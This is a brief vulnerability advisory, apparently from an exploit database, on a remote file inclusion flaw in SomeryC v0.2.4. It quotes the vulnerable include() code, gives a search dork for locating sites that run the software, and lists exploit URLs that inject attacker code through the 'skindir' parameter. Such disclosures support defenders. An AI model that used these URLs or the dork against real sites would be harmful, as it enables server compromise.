SomeryC v0.2.4 Remote File Inclusion Vulnerability on include.ph
### SomeryC <= v0.2.4 Remote File Include ###
#Vendor: http://someryc.mostpopularcomic.com
#download http://someryc.mostpopularcomic.com/sC024.zip
#found by: Katatafish ([email protected])
#d0rk: "powered by someryc"
#vuln-code(/admin/system/include.php):
if ($start) {
....
include("$skindir/header.php");
}
....
include("$skindir/footer.php");
#exploit:
http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]
# sebug.net
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo